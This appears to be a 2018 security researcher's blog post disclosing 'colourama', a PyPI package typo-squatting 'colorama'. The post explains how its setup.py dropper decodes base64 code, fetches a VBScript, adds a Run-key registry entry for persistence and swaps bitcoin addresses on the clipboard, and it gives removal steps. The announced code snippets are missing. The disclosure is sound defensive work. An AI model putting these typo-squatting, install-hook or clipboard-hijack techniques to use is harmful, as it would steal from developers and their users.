21 Oct 2018
If you’ve ever installed a PyPI package named ‘colourama’, you probably want to read further.
As mentioned in a previous blog post (Detecting Cyber Attacks on PyPI), for the last year I have been doing research on automated detection of malicious code in the PyPI repository. In an initial scan of the PyPI repository earlier this year, I detected eleven malicious packages and reported them to the PyPI maintainers privately. Since then, I’ve continued improvements to the detection tool and recently rescanned the PyPI repository.
While analyzing the data from the rescan, I discovered an interesting PyPI package named ‘colourama’. The package is typo-squatting the popular PyPI package named ‘colorama’. The ‘colourama’ package contains a malware dropper which targets Windows machines and downloads a second stage that implements a cryptocurrency clipboard hijacker written in VBScript. When the VBScript executes, it creates a new script and adds a Windows registry entry to execute it whenever the user logs into the machine. This script runs in the background and checks the Windows clipboard every 500 ms. If the script detects anything on the clipboard that resembles a bitcoin address, it replaces it with a bitcoin address under control of the attacker. This means that at any time a user of the machine attempts to pay someone with bitcoins by copying a bitcoin address from an email or website, it will be replaced by the attacker’s bitcoin address.
Details about the Colourama Package
The ‘colourama’ package have been on PyPI since December 5th, 2017. The author seems to have copied the colorama code and then added special installer code (the malware dropper). According to pypistats.org it has been downloaded 55 times in the last month. The package has been reported to the PyPI administrators.
It would be a good idea to uninstall the ‘colourama’ package, however this will not stop or remove the malicious VBScript. The ‘colourama’ package downloads and installs the malicious VBScript during installation, but never uninstalls it.
Based on my analysis of the code, to fully remove this malware the following should be done (however, it is your responsibility to safely delete files and registry entries and do your own due diligence based on your specific PC):
- Delete the VBScript installed in PROGRAMDATA under \Microsoft Essentials\Software Essentials.vbs”.
- Delete the “Microsoft Software Essentials” registry entry under “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”.
- Stop the associated process — it will likely show up as ‘wscript’ in the process list or alternatively restart the machine.
Detailed Analysis of the Malicious Code
The setup.py file in ‘colourama’ package contains the following class that is called as part of the package install.
The request to ‘hxxps://grabify.link/E09EIF’ seems like it is used for tracking installs of the package since it just redirects to tacobell’s website and the response data is not used by the code. Using grabify.link gives the bad actor the ability to track the amount of installs, the OS on which it was installed and the IP address of where the package were installed. The large base64 encoded string (redacted from the code snippet above for brevity) is decoded and executed as Python code. The code contained in the base64 encoded string is shown below:
The malicious code above first checks if it is running on a Windows system and then attempts to download a VBScript from hastebin and if that fails it tries to download it from pastebin through a base64 encoded URI on github. Base64 encoded strings are used to obfuscate all URLs. The first try/except block in the code appears to be a diversion and doesn’t do anything useful other than generating an exception so the code enters the second try/except block where a request is made to hastebin and the response is written to a .vbs file which is then executed.
The VBScript downloaded from hastebin is shown below:
The script creates persistence through a registry entry and then creates a new script and executes it. This script will also start every time the user log into the machine and will monitor the Windows clipboard for bitcoin addresses and replace them with a bitcoin address of the bad actor’s choice.